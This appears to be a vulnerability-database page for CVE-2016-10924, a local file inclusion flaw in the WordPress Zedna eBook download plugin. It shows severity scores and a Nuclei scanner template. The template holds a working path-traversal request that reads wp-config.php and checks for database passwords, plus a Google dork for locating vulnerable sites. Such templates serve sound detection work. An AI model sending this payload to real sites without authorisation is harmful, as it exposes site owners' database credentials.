Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-10924
HistoryNov 24, 2021 - 12:58 p.m.

Wordpress Zedna eBook download <1.2 - Local File Inclusion

2021-11-2412:58:55
ProjectDiscovery
github.com
14
cve2016
wordpress
edb
wp-plugin
lfi
ebook
wpscan
zedna_ebook_download_project
file inclusion
update

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.009

Percentile

82.8%

Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
id: CVE-2016-10924

info:
  name: Wordpress Zedna eBook download <1.2 - Local File Inclusion
  author: idealphase
  severity: high
  description: |
    Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
  remediation: |
    Update to the latest version of the plugin to fix the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
    - https://www.exploit-db.com/exploits/39575
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10924
    - https://wordpress.org/plugins/ebook-download/#developers
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2016-10924
    cwe-id: CWE-22
    epss-score: 0.01089
    epss-percentile: 0.84323
    cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: zedna_ebook_download_project
    product: zedna_ebook_download
    framework: wordpress
    google-query: inurl:"/wp-content/plugins/ebook-download"
  tags: cve2016,cve,wordpress,edb,wp-plugin,lfi,ebook,wp,wpscan,zedna_ebook_download_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210085fc3986ae66d40990e4a31f02cda6025e0cf6c150b726abb5ee64d8b910edf6022030737c9f147c5262287ddeb3743d846c5b60018f119a3e2ca38e94b557e03376:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.009

Percentile

82.8%

Related for NUCLEI:CVE-2016-10924